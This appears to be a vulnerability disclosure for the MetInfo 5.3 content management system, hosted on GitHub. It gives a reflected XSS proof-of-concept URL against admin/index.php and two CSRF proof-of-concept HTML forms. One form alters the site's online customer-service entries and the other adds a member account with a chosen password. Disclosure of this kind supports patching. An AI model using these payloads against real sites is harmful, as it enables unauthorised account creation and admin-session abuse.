Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

XSS

MetInfo5.3 application is vulnerable to Cross-Site scripting (XSS) vulnerabilities. Attackers can inject arbitrary web script or HTML via the class1 parameter or the anyid parameter to admin/index.php.

Vulnerability parameter:&class1、&anyid

Poc:

http://127.0.0.1/MetInfo5.3/admin/index.php?n=content&c=article_admin&a=doindex&class1=2"><script>alert(111)</script>&lang=cn&anyid=29"><script>alert(111)<%2fscript>

CSRF-1

MetInfo5.3 application is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. A successful CSRF attack can force the administrator to add an malicious online customer service.

Poc:

<html>
  <body>
    <form action="http://127.0.0.1/MetInfo5.3/admin/interface/online/delete.php?anyid=71&lang=cn&class1=" method="POST">
      <input type="hidden" name="allid" value="6&#44;" />
      <input type="hidden" name="action" value="editor" />
      <input type="hidden" name="id" value="6" />
      <input type="hidden" name="no&#95;order&#95;6" value="1" />
      <input type="hidden" name="name&#95;6" value="mm" />
      <input type="hidden" name="qq&#95;6" value="123123" />
      <input type="hidden" name="msn&#95;6" value="" />
      <input type="hidden" name="taobao&#95;6" value="mm123" />
      <input type="hidden" name="alibaba&#95;6" value="mm123" />
      <input type="hidden" name="skype&#95;6" value="" />
      <input type="hidden" name="saveorder" value="ä&#191;&#157;å&#173;&#152;" />
      <input type="hidden" name="action&#95;type" value="del" />
      <input type="hidden" name="allid" value="6&#44;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Before the attack: After the attack: Display on the home page:

CSRF-2

MetInfo5.3 application is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. A successful CSRF attack can force the administrator to add a member with specialized username and password.

Poc:

<html>
  <body>
    <form action="http://127.0.0.1/MetInfo5.3/admin/index.php?lang=cn&anyid=73&n=user&c=admin_user&a=doaddsave" method="POST">
      <input type="hidden" name="username" value="www" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="groupid" value="1" />
      <input type="hidden" name="valid" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Before the attack: After the attack: